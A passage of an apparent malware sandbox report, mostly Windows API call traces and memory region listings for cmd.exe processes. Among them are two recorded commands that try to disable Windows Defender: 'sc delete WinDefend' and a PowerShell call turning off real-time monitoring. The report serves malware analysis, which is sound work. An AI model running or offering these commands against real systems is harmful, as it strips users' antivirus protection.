(_String1="sc", _String2="MOVE") returned 6 [0120.377] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0120.377] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0120.377] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0120.377] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0120.377] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0120.377] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0120.377] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0120.377] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0120.377] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0120.377] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0120.377] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0120.377] SetErrorMode (uMode=0x0) returned 0x0 [0120.377] SetErrorMode (uMode=0x1) returned 0x0 [0120.377] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x423060, lpFilePart=0x22f378 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f378*="system32") returned 0x13 [0120.377] SetErrorMode (uMode=0x0) returned 0x1 [0120.378] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0120.378] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.383] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x22f0f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0f4) returned 0x4233e0 [0120.385] FindClose (in: hFindFile=0x4233e0 | out: hFindFile=0x4233e0) returned 1 [0120.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x22f0f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0f4) returned 0xffffffff [0120.385] GetLastError () returned 0x2 [0120.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f0f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f0f4) returned 0x4233e0 [0120.385] FindClose (in: hFindFile=0x4233e0 | out: hFindFile=0x4233e0) returned 1 [0120.385] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0120.385] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0120.385] GetConsoleTitleW (in: lpConsoleTitle=0x22f5ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.386] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f474, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f53c | out: lpAttributeList=0x22f474, lpSize=0x22f53c) returned 1 [0120.386] UpdateProcThreadAttribute (in: lpAttributeList=0x22f474, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f534, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f474, lpPreviousValue=0x0) returned 1 [0120.386] GetStartupInfoW (in: lpStartupInfo=0x22f430 | out: lpStartupInfo=0x22f430*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="WecVers", _MaxCount=0x7) returned -20 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.387] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.387] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0120.388] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x22f4d0*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f51c | out: lpCommandLine="sc delete WinDefend", lpProcessInformation=0x22f51c*(hProcess=0x78, hThread=0x74, dwProcessId=0x410, dwThreadId=0x418)) returned 1 [0120.416] CloseHandle (hObject=0x74) returned 1 [0120.416] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.416] GetEnvironmentStringsW () returned 0x424990* [0120.417] FreeEnvironmentStringsW (penv=0x424990) returned 1 [0120.417] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0121.057] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x22f410 | out: lpExitCode=0x22f410*=0x5) returned 1 [0121.057] CloseHandle (hObject=0x78) returned 1 [0121.058] _vsnwprintf (in: _Buffer=0x22f558, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f41c | out: _Buffer="00000005") returned 8 [0121.058] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1 [0121.058] GetEnvironmentStringsW () returned 0x4277d0* [0121.058] FreeEnvironmentStringsW (penv=0x4277d0) returned 1 [0121.058] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0121.058] GetEnvironmentStringsW () returned 0x4277d0* [0121.058] FreeEnvironmentStringsW (penv=0x4277d0) returned 1 [0121.058] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f474 | out: lpAttributeList=0x22f474) [0121.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.058] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0121.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0121.059] _get_osfhandle (_FileHandle=0) returned 0x3 [0121.059] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0121.059] SetConsoleInputExeNameW () returned 0x1 [0121.059] GetConsoleOutputCP () returned 0x1b5 [0121.059] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0121.059] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.059] exit (_Code=5) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x79fa3000" os_pid = "0x894" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x698" cmd_line = "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1746 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1747 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1748 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1749 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1750 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1751 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1752 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1753 start_va = 0x4a090000 end_va = 0x4a0dbfff entry_point = 0x4a090000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1754 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1755 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1756 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1757 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1758 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1759 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1760 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1761 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1762 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1763 start_va = 0xe0000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1764 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1765 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1766 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1788 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1789 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1790 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1791 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1792 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1793 start_va = 0x754b0000 end_va = 0x754b6fff entry_point = 0x754b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1794 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1795 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1796 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1797 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1798 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1799 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1800 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1801 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1802 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1803 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1804 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1805 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1806 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1807 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1808 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1809 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1810 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1811 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1812 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1813 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1814 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1815 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1816 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1817 start_va = 0x7d0000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1818 start_va = 0x960000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1819 start_va = 0x1d60000 end_va = 0x20a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 1863 start_va = 0x20b0000 end_va = 0x237efff entry_point = 0x20b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 109 os_tid = 0x890 [0120.264] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x45f9cc | out: lpSystemTimeAsFileTime=0x45f9cc*(dwLowDateTime=0xe82b54e0, dwHighDateTime=0x1d48db2)) [0120.264] GetCurrentProcessId () returned 0x894 [0120.264] GetCurrentThreadId () returned 0x890 [0120.264] GetTickCount () returned 0x2a39e [0120.264] QueryPerformanceCounter (in: lpPerformanceCount=0x45f9c4 | out: lpPerformanceCount=0x45f9c4*=1818788800000) returned 1 [0120.265] GetModuleHandleA (lpModuleName=0x0) returned 0x4a090000 [0120.265] __set_app_type (_Type=0x1) [0120.265] __p__fmode () returned 0x75ab31f4 [0120.266] __p__commode () returned 0x75ab31fc [0120.266] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0b21a6) returned 0x0 [0120.266] __getmainargs (in: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c, _DoWildCard=0, _StartInfo=0x4a0b4140 | out: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c) returned 0 [0120.266] GetCurrentThreadId () returned 0x890 [0120.266] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x890) returned 0x60 [0120.267] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0120.267] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f [0120.267] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x45f95c | out: phkResult=0x45f95c*=0x0) returned 0x2 [0120.323] VirtualQuery (in: lpAddress=0x45f993, lpBuffer=0x45f92c, dwLength=0x1c | out: lpBuffer=0x45f92c*(BaseAddress=0x45f000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.323] VirtualQuery (in: lpAddress=0x360000, lpBuffer=0x45f92c, dwLength=0x1c | out: lpBuffer=0x45f92c*(BaseAddress=0x360000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0120.323] VirtualQuery (in: lpAddress=0x361000, lpBuffer=0x45f92c, dwLength=0x1c | out: lpBuffer=0x45f92c*(BaseAddress=0x361000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0120.323] VirtualQuery (in: lpAddress=0x363000, lpBuffer=0x45f92c, dwLength=0x1c | out: lpBuffer=0x45f92c*(BaseAddress=0x363000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.323] VirtualQuery (in: lpAddress=0x460000, lpBuffer=0x45f92c, dwLength=0x1c | out: lpBuffer=0x45f92c*(BaseAddress=0x460000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0120.323] GetConsoleOutputCP () returned 0x1b5 [0120.324] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.324] SetConsoleCtrlHandler (HandlerRoutine=0x4a0ae72a, Add=1) returned 1 [0120.324] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.324] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0120.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.326] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0120.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0120.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0120.332] GetEnvironmentStringsW () returned 0x4e2388* [0120.333] FreeEnvironmentStringsW (penv=0x4e2388) returned 1 [0120.333] GetEnvironmentStringsW () returned 0x4e2388* [0120.333] FreeEnvironmentStringsW (penv=0x4e2388) returned 1 [0120.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45e8cc | out: phkResult=0x45e8cc*=0x68) returned 0x0 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x0, lpData=0x45e8d8*=0x0, lpcbData=0x45e8d0*=0x1000) returned 0x2 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x1, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x0, lpData=0x45e8d8*=0x1, lpcbData=0x45e8d0*=0x1000) returned 0x2 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x0, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x40, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x40, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.333] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x0, lpData=0x45e8d8*=0x40, lpcbData=0x45e8d0*=0x1000) returned 0x2 [0120.333] RegCloseKey (hKey=0x68) returned 0x0 [0120.333] RegOpenKeyExW (in: 